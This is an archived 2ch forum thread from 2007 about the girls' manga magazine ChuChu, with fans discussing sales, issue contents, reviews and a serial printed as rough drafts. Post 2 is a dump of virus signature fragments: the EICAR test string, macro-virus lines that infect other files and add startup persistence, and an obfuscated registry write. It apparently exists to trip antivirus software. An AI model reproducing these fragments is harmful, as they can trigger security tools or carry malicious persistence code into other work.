2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ハツラブ】chuchu ちゅちゅ その4 【応援】

1 :花と名無しさん:2007/10/08(月) 18:59:12 ID:???0
少女漫画誌”ちゅちゅ”のスレです。

□ おやくそく。
1.各作家のまんがに傾いた話題になってきたら、それぞれの専用スレに移動してくださいね。
2.各作家の専用スレは>>2以降を参照してください。
3.他出版社、他少女雑誌、そしてそれらを比較する話題は、それぞれの専用スレで行ってください。
4.荒らしや自作自演は徹底スルーでお願いします。
5.ちゅちゅに限らず、少女まんがを原作にしたアニメを原作よりで話したい人は
  アニメサロン板の「少女漫画関連&女児向けアニメ」スレに移動しましょう。
6.月刊ちゃおの話題は、下のリンクにある「ちゃお」スレでおねがいね。

公式
ttp://www.chuchu.jp/
Wikipedia
ttp://ja.wikipedia.org/wiki/ChuChu

過去スレ
1.http://comic6.2ch.net/test/read.cgi/gcomic/1124005696/l50
2.http://comic6.2ch.net/test/read.cgi/gcomic/1144744370/l50
3.http://anime2.2ch.net/test/read.cgi/gcomic/1160475941/l50

姉妹スレ:マターリ at ちゃお その25
http://anime2.2ch.net/test/read.cgi/gcomic/1188177641/l50
少女コミックは好きですか?Part21
http://anime2.2ch.net/test/read.cgi/gcomic/1176333360/l50

□ 姉妹誌 
”ちゃお”
ttp://www.ciao.shogakukan.co.jp/
”少女コミック”
ttp://www.sho-comi.com/


2 :花と名無しさん:2007/10/08(月) 19:00:21 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2007/10/08(月) 19:02:48 ID:???0
□ ちゅちゅ作家スレ

おおばやしみゆき Part7
http://anime2.2ch.net/test/read.cgi/gcomic/1136484748/l50
宮脇ゆきの
http://anime2.2ch.net/test/read.cgi/gcomic/1154830890/l50
【さゆみん】中村紗弓【MAX!】
http://anime2.2ch.net/test/read.cgi/gcomic/1155821274/l50
姫川きららさんを語りましょう
http://anime2.2ch.net/test/read.cgi/gcomic/1186191314/l50
【アクメ】ドキューン♀【ひと恋】やぶうち優♂【つぼみ】
http://anime2.2ch.net/test/read.cgi/gcomic/1183321871/l50

”ちゅちゅ” 作家公式サイト (順不同)
宇佐美多恵      ttp://taemanaihibi.blog80.fc2.com/
おおばやしみゆき   ttp://www.geocities.jp/himatuu/
かわはらなつみ    ttp://blog.livedoor.jp/natsumixchu2/
しがの夷織      ttp://homepage3.nifty.com/shigaponroom/
杉山美和子      ttp://blog.livedoor.jp/sugi_miwa/
高宮智        ttp://strangeparadise.fc2web.com/
中村紗弓       ttp://id3.fm-p.jp/39/sayuwor/
七島佳那       ttp://www13.ocn.ne.jp/~nanow/
水都あくあ      ttp://aquaizan.com/
溝口涼子       ttp://ip.tosp.co.jp/i.asp?i=zohgu
宮脇ゆきの      ttp://cafe-yuki.seesaa.net/
やぶうち優      ttp://www.dab.hi-ho.ne.jp/yabuuchi/


4 :花と名無しさん:2007/10/08(月) 19:09:49 ID:???0
ちゅちゅ11月号は10月14日頃発売

あまり載せたくないけど叱咤の意味を込めて
<創刊からの文教堂売上推移データ>
2006年
1月号 ちゅちゅ 1693
2月号 ちゅちゅ 1472
3月号 ちゅちゅ 1341
4月号 ちゅちゅ 1292
5月号 ちゅちゅ 1294
6月号 ちゅちゅ 1279
7月号 ちゅちゅ 1231
8月号 ちゅちゅ 1247
9月号 ちゅちゅ 1157
10月号 ちゅちゅ 1161
11月号 ちゅちゅ 1189
12月号 ちゅちゅ 1074
2007年
1月号 ちゅちゅ 1089
2月号 ちゅちゅ 1138
3月号 ちゅちゅ 1113
4月号 ちゅちゅ 1117
5月号 ちゅちゅ 1146
6月号 ちゅちゅ 1049
7月号 ちゅちゅ 1037
8月号 ちゅちゅ 1002
9月号 ちゅちゅ  958

ガンガレちゅちゅ!


5 :花と名無しさん:2007/10/09(火) 07:33:38 ID:???0
確かに、何かドでかいヒット作さえ出れば
白癬のメロディよろしく
「いつつぶれるんだ」と心配されながらも
どーにか生きながらえることもできるもんね


6 :花と名無しさん:2007/10/10(水) 08:36:48 ID:???O
>>1
乙です
>>5
さくら前線が小学館漫画賞を受賞したらどうだろうか

7 :花と名無しさん:2007/10/10(水) 09:50:56 ID:???0
小学館漫画賞など何の権威もない。
自社(集英社・白泉社含む)作品べた褒めの糞賞だろ、あんなの。

まだ講談社漫画賞のほうが客観的な評価をしているわな。
ミルモだって講談社〜に評価されてから小学館〜が評価しただろ。

8 :花と名無しさん:2007/10/10(水) 10:03:56 ID:???0
>>7
そりゃまーそーだろーけど
ここで言うことでもねーだろ

死にかけてる雑誌なんだから
それに鞭打つまねするなよ・・・

9 :花と名無しさん:2007/10/10(水) 13:15:06 ID:???O
>>7
この際、権威などなくても少しは雑誌の宣伝になれば良いのですよw
書店にもコミックスが平積みされて帯とかにも受賞ってデカデカ書かれれば少しは知名度上がるかなと

10 :花と名無しさん:2007/10/10(水) 18:12:22 ID:???0
>まだ講談社漫画賞のほうが客観的な評価をしているわな。
でもその講談社漫画賞だって小学館が席巻してるからねw

しかも小学館漫画賞を受賞している漫画のほうがどうかんがえても
講談社漫画賞受賞したものより知名度の高いものばかり。

11 :花と名無しさん:2007/10/10(水) 18:20:43 ID:???0
講談社漫画小の場合は、奨学金っぽいいみあいもあるからじゃね?

12 :花と名無しさん:2007/10/10(水) 19:44:23 ID:???0
【著作権】 地デジ録画のルール、「コピーワンス」→「ダビング10」に…アナログ出力は「コピー可」に
http://news22.2ch.net/test/read.cgi/newsplus/1192002915/l50

>5
ダビングテンのマスコットに王のみやてんを使ってもらう

13 :いまいちまとまらん:2007/10/10(水) 22:27:30 ID:???O
王=ワン
→ワンのみ→コピワン

14 :花と名無しさん:2007/10/11(木) 20:15:19 ID:???0
>>12-13
誰がうまいこと言えと

15 :花と名無しさん:2007/10/13(土) 02:34:37 ID:dPqJrpIc0
発売日あげ
コンビニで買ってきたけど、
どうしたんだろ、おおばやし先生

16 :花と名無しさん:2007/10/13(土) 07:02:24 ID:???O
まだこの糞雑誌あったのか
絵が下手で話作りも下手な漫画ばかりでよく潰れないなpgr

17 :花と名無しさん:2007/10/13(土) 07:04:51 ID:???0
>>16
だったらちゃおはどーなるんだよw

18 :花と名無しさん:2007/10/13(土) 12:06:54 ID:???O
しかしちゅちゅ漫画のクオリティの低さは異常
一つとして心に響く作品が無いwww

19 :花と名無しさん:2007/10/13(土) 12:46:37 ID:???0
>>16
内容面での規制が厳しすぎるのが一因では?
何て言うか、作者の実力を編集が出し切れてない。

つか、自由にさせすぎると男ヲタがよってくるとか余計な心配
してんじゃねーよと言いたい。<編集

20 :花と名無しさん:2007/10/13(土) 12:50:52 ID:???0
明らかな釣りに反応するなってw

21 :花と名無しさん:2007/10/13(土) 12:53:55 ID:???0
でも、やぶうちや陣名にセーブさせすぎとかは、感じないか?
マジな話

22 :花と名無しさん:2007/10/13(土) 15:14:34 ID:???0
>21
同意

23 :花と名無しさん:2007/10/13(土) 15:26:34 ID:???0
ttp://chuchu-net.jp/blog/?tdate=2007-10-13-126
おー、表紙が陣名さん!

24 :花と名無しさん:2007/10/13(土) 15:34:07 ID:???0
かわゆいねぇ。>表紙

25 :花と名無しさん:2007/10/13(土) 19:00:38 ID:???0
じー んー なー
かーわーいーv

26 :花と名無しさん:2007/10/13(土) 19:28:43 ID:???P
つまり高宮さんのBL漫画解禁つーことですか

…って確か学館って水城さんで懲りてるだろ。それ

27 :花と名無しさん:2007/10/13(土) 20:07:45 ID:???0
なんかキモい男がいるんですが。
ページめくったら、あ、結構かっこいい。
着るもので全然変わるんですね。
(グラビアページ)

28 :花と名無しさん:2007/10/13(土) 20:43:35 ID:???0
さくらどうやって終わるんだろう

29 :花と名無しさん:2007/10/14(日) 11:04:00 ID:???O
AL10検定の応募方法
>官製はがきに(1)〜(5)を書いて
ってどういう意味?
検定1〜検定3までの答え全部だとちょうど5個だけど、
他のところの文面からはクロスワードだけでいいようにも思えるし。

30 :花と名無しさん:2007/10/14(日) 11:10:05 ID:???0
11号天麩羅です。
【表紙/陣名】
【乙女道(新)/陣名】
【六花おかわり/にみ】
【キミうた/みっぞん】
【ひとひら/やぶ】
【さくら/ばやし】
【×××/宇佐美】
【告白日和(後)/あらい】
【恋ナン(終)/杉山】
【ジェミニ/ゆきのん】
【星栞/さゆみん】
【フルジョ(終)/高宮】

【行ったもん/陣名】
【ドキズキ/笹木】
【ちゅちゅ新聞】

特集
【KAT-TUN 田口】
【2007男白書】
【AL10検定】

別冊ふろく
【ビタミン/七島】
【PN/茶月】
【さあ恋/小金沢】
【TS/かわはら】
【恋プロ/こはく】

【総評】
【次号】

31 :花と名無しさん:2007/10/14(日) 11:13:25 ID:???0
次号予告
【新連載】杉山(巻頭)、七島
【Xmas読みきり】中嶋、京町、七瀬

【特集・その他】
・クリスマスカード&年賀状 10000名大プレゼント!!
・ちゅちゅガール リアルライフアンケート結果大発表!
・スペシャルグラビア新垣結衣
・水都あくあ先生新れんさい応援プロジェクト!
・さくら前線最終回

>>29
@〜Dとは下の@郵便番号等のことを言っているんジャマイカ?


32 :花と名無しさん:2007/10/14(日) 17:33:49 ID:???O
>31
納得。ありがとう。

33 :花と名無しさん:2007/10/14(日) 22:38:09 ID:???0
11月号げと。てんぷらいただきます。
改行が多いみたいなので分けます。

【表紙/陣名】 アナログ最高。少女漫画って感じする。
【乙女道(新)/陣名】今月号トップの面白さだった。
【六花おかわり/にみ】 穏やかな展開で飽きてきた。
【キミうた/みっぞん】 いろんな恋があるなぁと思う。
【ひとひら/やぶ】 円満終了フラグと思ったけどそうでもないのか。
【さくら/ばやし】 体調悪い?次号最終回ってのも急だし。それが心配。
【×××/宇佐美】 キャラ設定がよくわからないまま終わった。
【告白日和(後)/あらい】 丁寧に穏やかに進んで終わった感じ。
【恋ナン(終)/杉山】 だんだん好きになってきた。次回作楽しみ。
【ジェミニ/ゆきのん】 こうなるまでがゆっくりすぎた気が。宮脇節に期待。
【星栞/さゆみん】 なんかもうアレだ。ずっと巻末でいいです。
【フルジョ(終)/高宮】 また3回終了かーという印象。詰め込みすぎた?

【行ったもん/陣名】海峡を越えて執事喫茶行ってみたいよ。
【ドキズキ/笹木】 スルー
【ちゅちゅ新聞】 目を通したが記憶に残らず。

34 :花と名無しさん:2007/10/14(日) 22:40:06 ID:gnxM3xnR0
>>33のつづき。
特集
【KAT-TUN 田口】 美童は日本人じゃない。そこが一番許せない。
【2007男白書】 誰にアンケートとったのかが気になる。
【AL10検定】 特に興味なし。

別冊ふろく
【ビタミン/七島】 キャラが活きてた。
【PN/茶月】 最近ちゃおで似たような話読んだ。
【さあ恋/小金沢】 心理描写が大雑把な感じ。
【TS/かわはら】 ”背の低い主人公”って感じしなかった。
【恋プロ/こはく】 何もかも中原杏。

【総評】 ちゃお陣の充実振りがなかなか満足。
     さゆみんと宇佐美ってなんだか浮いてるのが気がかり。
【次号】 さくら最終回ってのがいちばん気になります。

表紙見て「あれ、12月号だっけ?」と思ってしまった。
特集はもう関係ない年齢だけど、漫画が結構面白かった。
売上上がるといいなぁ。

35 :花と名無しさん:2007/10/14(日) 23:25:08 ID:???O
ね、本当にどうしたの?おおばやしセンセは。

36 :花と名無しさん:2007/10/14(日) 23:43:00 ID:???0
【表紙/陣名】 可愛い。でもなんか、色合いがクリスマスっぽいような…w
【乙女道(新)/陣名】 面白かった!ヒロインのヲタ度のハンパなさっぷりがいい。
【六花おかわり/にみ】 椎葉先輩との展開を期待していいのか?
【キミうた/みっぞん】 この二人の話、続いてたんだな。うまくまとめてあげてくれー!
【ひとひら/やぶ】あまりの丸く収まりっぷりに 最終回かとオモタ。今回の〆方、「さくら」思い出した。
【さくら/ばやし】 もともとキャラの見分けつきにくいのに、今回はホントに分かりづらい…
【×××/宇佐美】 何でヒロイン丁寧語?
【告白日和(後)/あらい】 えーと?男が一回断ったのは主人公に興味がなかった(女として意識してなかった)
からで、告られて意識しだして好きになったってこと?
【恋ナン(終)/杉山】 おいおい、さゆのキャラ最終回で崩壊かよw
【ジェミニ/ゆきのん】 結局どっちとくっつけたいんだろう…弟エンドなんだろうけど、
何か和泉の存在、今のところあんまり意味がないような気がする。
【星栞/さゆみん】あれ?映画に字幕がある…この映画、邦画じゃないんだ?とか
どうでもいいことが気になった。
【フルジョ(終)/高宮】 「便利だから」の言葉に傷ついて出てったのに、そのフォローがなかった…
【行ったもん/陣名】いいなー執事カフェ、行ってみたいなー
【ドキズキ/笹木】 スルー
【ちゅちゅ新聞】 読んでない。
特集
【KAT-TUN 田口】きみ、 激しく金髪が似合わないな。
【2007男白書】 若いっていいなー。
【AL10検定】 読んでない。
別冊ふろく
【ビタミン/七島】 主人公が変わっていく過程がちゃんと描かれててすごく良かった。
【PN/茶月】 この人の絵は前からすごく好き。しかし…芸能人が…いいのか?
【さあ恋/小金沢】 あれ?男、何部?
【TS/かわはら】 まて、「気に入ってる」に「はいってる」ってルビ振っちゃダメだろう。
気になって話どうでもよくなったじゃないか。
【恋プロ/こはく】ダサいのとイケてるのの違いが分かりにくいよ。

【総評】 陣名っちの新連載が一際輝いて見えた。
【次号】七島さん期待。杉山さんは、また同じノリなのかなー…

37 :花と名無しさん:2007/10/15(月) 19:10:28 ID:???O
陣名はガキっぽいのも大人っぽいのも描けて良いな

38 :花と名無しさん:2007/10/15(月) 20:23:12 ID:???0
最新号をちょっと立ち読みしたけど
おおばやしの絵、えらい荒れてたな
何か下書きみたいだったなあ・・・

39 :花と名無しさん:2007/10/15(月) 20:47:33 ID:???O
下書きにトーン貼っただけだろ。
めちゃくちゃムカついたんだが。未完成なら載せんな、と。
表紙もペン入れはしてるようだが雑だし…

40 :花と名無しさん:2007/10/15(月) 23:38:14 ID:SAubqOoB0
これだけ大々的に、しかも何度も
下書きを掲載しておきながら、
読者に対しておわびも説明も一切無し。
読者をなめ切ってるとしか思えない。
金返せ。


41 :花と名無しさん:2007/10/16(火) 00:01:22 ID:???0
さて、chuchu崩壊の序曲〜

42 :花と名無しさん:2007/10/16(火) 07:20:55 ID:???0
>>40
来月号あたり事情説明があるんじゃないの?
まー「金返せ」という気持ちはわかるな

43 :花と名無しさん:2007/10/16(火) 07:48:06 ID:???P
ひま通で言い訳するんでないの?
病気でアレなら仕方ないが

44 :花と名無しさん:2007/10/16(火) 08:46:14 ID:???O
>>43
「病気なら何しても仕方ない」とまで読んだ

45 :花と名無しさん:2007/10/17(水) 00:01:17 ID:???0
>>44
つまり全部だな

46 :花と名無しさん:2007/10/17(水) 00:17:50 ID:???0
前回の下書き掲載の時も、その後の事情説明は無かったので、
今回も無いとみた。

47 :花と名無しさん:2007/10/17(水) 01:05:24 ID:???O
14日に11月号パラパラ立ち読みした時に、さくらの下書き掲載が目に入って買う気が無くなった。
立ち読みで終わりにしたとかではなく、他に欲しいコミクスがあったのでそっちを優先して、まだ未購入。
二度目ってゆうのもあるけど楽しみにしていた連載のひとつだけに、きちんと説明してもらえないと納得出来ないよ…

48 :花と名無しさん:2007/10/17(水) 01:44:35 ID:???0
六花おかわりの育美が激しくウザイ
終盤で何しようが巻き返せない状態
いいとこなし。
先輩とくっついてほしい。
少なくとも先輩を悪者にして育美の株を上げるような最低なことはしないでほしい。

49 :花と名無しさん:2007/10/17(水) 11:14:40 ID:???O
>>48
同意。ああいう無神経なのは現実にもいるタイプだが、
漫画の中でまでイラつかせるなよと。
私も先輩とくっついて欲しい派だけど、例えば一度付き合うとこまで
いったとしても、育実がちょっと何かしたら「やっぱり育実が好き!」って
戻っていきそうだ。

50 :花と名無しさん:2007/10/17(水) 21:06:26 ID:???0
>>46
わかる〜自分も読者からお金や手紙もらってる以上謝罪するのが道理って昔は思ってたけど、今じゃ謝罪広告見ることの方が少ない・・・

>>47
えっ二度目っ?おおばやしさんってもっと何度もあった気がする。『さくら』だけでも。記憶が混乱してたらスマそ

おおばやしさんってキャラのセリフやモノローグを、絵の表情なんかとうまくフリーズさせて読むのが難しい作家さんだとは思ってた。
なんか絵は画集、セリフとモノローグはソレとは別の『詩』みたいな。でも今月読んで、絵がないと更にこんなにも読みづらいのか・・・
と勉強したな。なんか誰が誰やらもわからくて混乱した・・・
一言欄で『足を捻挫した』様なこといってたから、それが原因かと思ったけど。年齢(トシ)も年齢だし。遠回しに下書きの理由言ってるのかな〜と。

51 :花と名無しさん:2007/10/17(水) 21:17:26 ID:???0
高宮智の連載、いつも理解不能だけど今月の最終回が今までで一番意味わからなかった。『ハァあ?????』ってかんじ。
設定やキャラの性格も飲み込みづらいのは自分だけか?しかも回数が進めば進むほど混乱・・・
ファンタジーはむしろ好きなんだが。『結局何が言いたいの?』的な。

>>48
自分はどちらかと言えば育実好きな方だったけど、今月の
『委員長の手伝いなんかしなくてもいいよ なんかあの人感じ悪いじゃん』ってセリフで一気に好感度下がった。
『なんか』って・・・先輩に嫉妬してるのかもしれないけど、もっと違うソフトな言い方あるだろ〜
しかもその後六花が『委員長確かに感じ悪いけど(笑)』なんて笑いながらいっててるのには呆れた・・・後輩に影でこんなコト言われてる先輩が
哀れで仕方なかった。

52 :花と名無しさん:2007/10/17(水) 21:38:18 ID:???O
>>51
でも何度顔合わせても忘れられたり、「ストーカー?」とか
言われたら、感じ悪いと思っても仕方なくない?
まだ先輩=いい人と思えるような挽回エピソードもないしね。

53 :花と名無しさん:2007/10/17(水) 21:53:59 ID:???0
>47
(立ち読みでよいので)陣名さんのを読もう!

54 :花と名無しさん:2007/10/17(水) 21:55:15 ID:???0
あ、終わったんだ、と後から気付いた>高宮さんの

55 :花と名無しさん:2007/10/17(水) 22:12:40 ID:???0
>>52
先輩=いい人エピソードは、これから出るのかと思ってた。
それから今月やっと六花の名字憶えたし。
育実は自分が女と会ってたと誤解されるようなことをして、(どんな事情があるかは不明だが)
六花が先輩と親しくなるのは気に食わないような素振りだから退かれるんじゃないの?
はぐらかさずにちゃんと説明すれば、『たいしたことじゃない』ともわかっただろうしね。
だから余計にラスト六花を『園田』って呼んだのが納得行かなかったのかも。あれは意地張ってるようにしかみえなかったな。
高校生男子って、あんな感じなのかも知れないけど。

56 :花と名無しさん:2007/10/18(木) 00:50:47 ID:???O
>>50
自分の知ってる限りは二度目です。ごめんなさい。
しばらく買ってない時期があったもので…。幾度となく下書き掲載していたとは軽くショックですorz
>>53
買いますよ!まだまだちゅちゅには頑張って欲しいのです(´;ω;`)

57 :花と名無しさん:2007/10/18(木) 04:15:11 ID:???0
育実は自分も好きじゃないなぁ
不器用ですれ違うっていうのは少女漫画ではありがちだが、
育実は不器用っていうより性格悪いっていうふうにしか見えない。
「別にどうでもいいけど」とか「園田」って呼ぶのとか、
妙にリアルでいそうなんだけどそれが逆に嫌
リアルだけど魅力ない
自分は誤解されるようなことしといて、自分がムカついたら先輩と散歩してればって・・・


58 :花と名無しさん:2007/10/18(木) 10:57:01 ID:???0
>>50 >>56
ちゅちゅに限ってのことなら
ばやしの下書き掲載は10月号が2度目だよ。
(ちゃおは99年からしか読んでないからわからんです)

それはそうと、陣名さん担当かわったのか?って
思うほどに第一話が神回だった。

いつも話が進むにつれてだんたんとしぼんでいってしまうのが
陣名さんの残念なところなんで、今回はこのまま突っ走って欲しい。
絵柄もかわいいし、看板になれるんじゃないか?


59 :花と名無しさん:2007/10/18(木) 15:26:30 ID:???O
育実の人気に嫉妬w

↑にも同じ発言あったけどこんな感じの男って実際多いよね
で、女の方もいつも友達に愚痴っているくせに、なんだかんだでその男が好きで別れない。
毎回相談受ける側としてはuzzeee!別れろって内心思う

まあ六花はケンタの可愛さに萌える漫画と思っている。今回のウン●してる所などは最高だった。
あと委員長のボケ具合もちょっとツボってきた。


60 :花と名無しさん:2007/10/18(木) 17:32:18 ID:???0
なんか、発言以外には特になにも『はぁ?』がないんだけどね、育実って。↑で六花に委員長を悪く言ったのがどうとか
あったけど、(もう連載終了したが)自分『なぜハニ』で全く逆のこと思ったんだよな。

外人が自宅にやってきてドッカーンな主人公に電話で愚痴られたとき、遠山?(ごめん名前あやふや)が
『文化の違いだけで人を判断するな』っていったでしょ。アレは感心した。好きな女にそんな風に言えるのも実際なかなか厳しいし、
自分が好きな人の家に男が住むなんてそれこそ嫉妬で悪口でも言っちゃいそうなのが。
今でもあの漫画では遠山?好きだな。

61 :花と名無しさん:2007/10/19(金) 01:25:48 ID:???0
「委員長の手伝いなんかしなくてもいいよ。なんかあの人感じ悪いじゃん」
「まぁどーでもいいけど」
「先約破ったって言ってもたいした用事じゃなかったじゃん」
「園田は先輩と散歩でもしていけば?」

ざっと問題のある発言を並べてみたけどこれはありがちな不器用な男の子ではないな。
全く好感が持てないし、こんなのを好きっていう主人公にも説得力がない。
この腹の黒さを見せてしまった以上、最後に「やっぱり育実が好き!」になるのは腑に落ちないな。

62 :花と名無しさん:2007/10/19(金) 18:02:43 ID:???0
さくらは最終回前に残念だね…

>>33
高宮さんは3回じゃなくて5回?じゃないか
内容がスカスカだからその位に思えるけど


63 :花と名無しさん:2007/10/19(金) 22:45:26 ID:???0
>>61 「先約破ったって言ってもたいした用事じゃなかったじゃん」
このセリフは育実の『自分が女と会ってたほうの用事』が「たいしたことない」んだと言ってるんだと思ってた。
でも>>61の文章を見て、なぜか『あー六花との先約のことか』と納得できたよ。ありがとう

64 :花と名無しさん:2007/10/21(日) 22:54:05 ID:???0
新垣結衣の取材はナカムリさんがしたみたいだね>編集部ダイアリー
どうせならガッキーさんが取材して、Wガッキーグラビアとかしたら面白そうなのに

65 :花と名無しさん:2007/10/22(月) 07:04:00 ID:???O
チャーミー(笑)

66 :花と名無しさん:2007/10/22(月) 22:32:25 ID:???0
さくら、最終回が突然すぎ。集めてた単行本売りたくなった。
陣名さんが前作あたりから面白くなったからそっち目当てでちゅちゅ読もうかな。

67 :花と名無しさん:2007/10/23(火) 07:43:12 ID:???0
>>66
確かに唐突な気がする
おおばやしと編集サイドに何があったんだ?

68 :花と名無しさん:2007/10/23(火) 12:36:03 ID:???0
下書き掲載は看板漫画としてはかなり問題で、それが2回目だからなぁ…
どちらかサイドが打ち切りを申し出ても不思議はないけどな

69 :花と名無しさん:2007/10/24(水) 11:19:03 ID:???0
バヤシはちゃお読者対策として見せ掛けの看板に仕立て上げていただけで、
本当の看板はやぶうちじゃないの?
かつてのなかよしやりぼんで行われていた、プッシュを目的とした一作家の
優遇策と思えば、別に不思議ではない。一時期の東京ミュウミュウや春田ななのような。

それとも、看板がきえるというぐらいだから、廃刊秒読み寸前なのか?

70 :花と名無しさん:2007/10/24(水) 12:32:39 ID:???P
>>68
ナチなんか何回もやっているじゃないか。

71 :花と名無しさん:2007/10/24(水) 16:40:29 ID:???O
公式HPのブログでは編集者一人増えたって書いてなかったか?
廃刊する雑誌に編集増やしたり、いかにも新規読者呼び込みをはかった
新人女優のインタビュー企画なんてやるんだろうか・・

72 :花と名無しさん:2007/10/24(水) 18:16:01 ID:???0
ちゅちゅは今スグに廃刊だとは思わない。ただちゃおやりぼんみたいに雑誌から連想する『イメージ』聞かれても
答えられないのはなんでじゃろ?
読者層もバラバラっぽいし、連載陣の作品の方向性もバラバラしてる気が。『初恋応援』なのは伝わるけど。

どうでもいいかもしれんが、宮脇さんの連載また男→主人公←男だね。いつもそうな気が。毎回必ず2人の間で揺れる主人公だなぁ。
人気はあるみたいだし、絵もかわいいけど。前の『NGボーイ』とは主人公のキャラはちがうけどね。

73 :花と名無しさん:2007/10/24(水) 19:21:35 ID:???0
宮脇の漫画はワンパタだから、
新規読者には適してても、読み続けるのには適してない。
スポーツ物やってた頃の方が絶対良かったと思う。

>>71
まだ、chuchuは生き残ると思ってるんだろうね。
そんなことでは無理。

もしchuchuが生き残りたければ、八神千歳、あらいこよこ、もりちかこを引き入れろ。
もりちかこはCEが大コケしたのでもうタイアップ要員にふさわしい所はない。

74 :花と名無しさん:2007/10/24(水) 20:12:08 ID:???O
創刊2周年を過ぎたところでガラリと誌風が変わると予想。

75 :花と名無しさん:2007/10/24(水) 22:08:14 ID:???O
やぶうちさんが本当の看板とか、いつも内勤やぶうちさん信者の人だろうけど、本屋の陳列状態をみればそれはまずないってわかると思うよ。

76 :花と名無しさん:2007/10/24(水) 22:52:57 ID:???0
やぶうちが看板というのは言いすぎたが、
実際のところは看板不在なんじゃないのか?

バヤシで戦えるのかどうか不安すぎるもん。

77 :花と名無しさん:2007/10/24(水) 23:08:11 ID:???P
看板は水都さんだと思ってた

78 :花と名無しさん:2007/10/25(木) 02:14:34 ID:???0
さゆみん、ブログに書いてあった人生最大のショックって何だろ クビ?

79 :花と名無しさん:2007/10/25(木) 06:46:22 ID:???0
盗作、二重投稿作家なんてクビになればいいんだよ

80 :花と名無しさん:2007/10/25(木) 07:38:47 ID:???P
かわはらとかこはくみたいな証拠身デブー予定がちゅちゅになった連中もか。

81 :花と名無しさん:2007/10/26(金) 08:11:45 ID:???0
>>73
もりはもう1年CAの新シリーズや星魂でひっぱるだろーし
八神やあらいはちゃおサイドが引き止めに入ってるみたいだしな
あんたの言ってる方が残念ながら無理

現有メンバーで強引に生き残り図るんじゃないの、chuchuは?
>>74
ひとまず2008年1月号は注目だな
>>77
看板は水都とおおばやしとやぶうちで逝くつもりだったんだろ、編集としちゃー
でも、やぶうちが脱落(ヲタネタ+近親恋愛はちょっと引く)したために
おおばやしと水都の二枚看板にせざるをえなかったんだろうな
でもおおばやしを外したらどうするんだろ?
陣名におおばやしの穴は埋め切れるのか?

82 :花と名無しさん:2007/10/26(金) 14:16:42 ID:???O
>>81
八神やあらいはちゃおサイドが引き止めに入ってるみたいだしな

え??これはどこ情報なわけ?
そもそも八神さんやあらいさんがちゃおを出たがっているのか?
どれもこれも結局推測だよね

83 :花と名無しさん:2007/10/26(金) 14:46:38 ID:???P
やがみんは両方で描きたいと言ってなかったっけ?
水沢めぐたんみたいに。

84 :花と名無しさん:2007/10/26(金) 16:58:20 ID:???0
宮脇ゆきのは看板じゃないの?かなり前ちゃおでなんとかいう連載してた時(相手役で芸能人が出てきて、
主人公が天パかなんなのかくるくるヘアで)『ちゃお人気NO,1!』とか表紙?にでっかく書いてあって
『そうか、ちゃお世代の子はこういうのが好きなのか』って思ったんだけど。
漫画描く技術はすごいと思うけど、読んでて新鮮みねぇなと思うときもある。
連載で芸能人がこんなしょっちゅう(2作に一回ぐらい?)出てくる漫画珍しいんじゃ・・・作者の趣味なのかなんなのか。まぁいいけど。

85 :花と名無しさん:2007/10/26(金) 19:57:40 ID:???0
人気No.1!とか大好評連載中!なんて嫌っつーほど使い古されたアオリ文句だろ…

86 :花と名無しさん:2007/10/26(金) 20:09:44 ID:???O
バロスwww

87 :花と名無しさん:2007/10/26(金) 23:28:42 ID:???0
>>81
てかそもそもやぶうちにとっては「ないしょのつぼみ」と同人が本業で、
chuchuはオマケだろ・・・。
>八神やあらいはちゃおサイドが引き止めに入ってるみたいだしな
低年齢化してるちゃおではむしろ浮きかけていて、止めに入るなんてあり得なくないか?

>>84
それはありえん・・・。
でも2003年ごろのちゃおは宮脇がプッシュされてたな。

88 :花と名無しさん:2007/10/27(土) 07:08:48 ID:???0
>>87
そうか?
あらいはともかく
八神は今ちゃおで描いてるやつ相当無理しているから
何らかの引止めが入ってるんじゃないのか?

89 :花と名無しさん:2007/10/27(土) 07:39:41 ID:???O
えー?無理しているっていうより、、、
八神さんが面白い漫画をただ描けていないだけだよなぁ
精神面の描写やストーリーの構成が小学生じゃ理解出来にくいが
中学生以降なら面白く読めるのに残念だなと思わせる作品を現時点ちゃおで
描いてるなら無理しているというか、もう辛そうだな思うけど
微妙なエロ描写のみちゃお向きじゃないだけで話の構成やらはちゃおレベルの
子供騙しか描けてないじゃんw
移籍してもらえるのならあらいさんでいいよ

90 :花と名無しさん:2007/10/27(土) 10:05:15 ID:???0
chuchuの作家も子供騙しが多いだろ。

91 :花と名無しさん:2007/10/27(土) 10:10:53 ID:???0
というか、
「りぼん」出身の矢沢あいが姉妹誌でロングセラー作家になっていたり、
「なかよし」のしゅごキャラが神作品になってるが、

そもそもそういうことが、「ちゃお」や「chuchu」には皆無ではないのか?
あらいも話の構成・恋愛描写に疑問を感じさせるところがある。

92 :花と名無しさん:2007/10/27(土) 11:04:46 ID:???P
りぼんとなかよしは純デブー後上に行ける用に編集同士のネットがあるがちゃおにはあまりないのかもな
ちゃおデブーで上で成功してるのって悠嶺さんくらいでは?
後は証拠身から連れて来られたのばかりだし

93 :花と名無しさん:2007/10/27(土) 11:51:58 ID:???0
>>>85
うん、そうなんだけど長年ちゃお読んできて『ちゃお』での人気NO,1ってアオリをみたのは初めてだったから印象に残ってるだけ

>>89
同感。八神の作品は好き嫌いが激しく分かれそう。モノローグやセリフでの棒線の多用とかも。
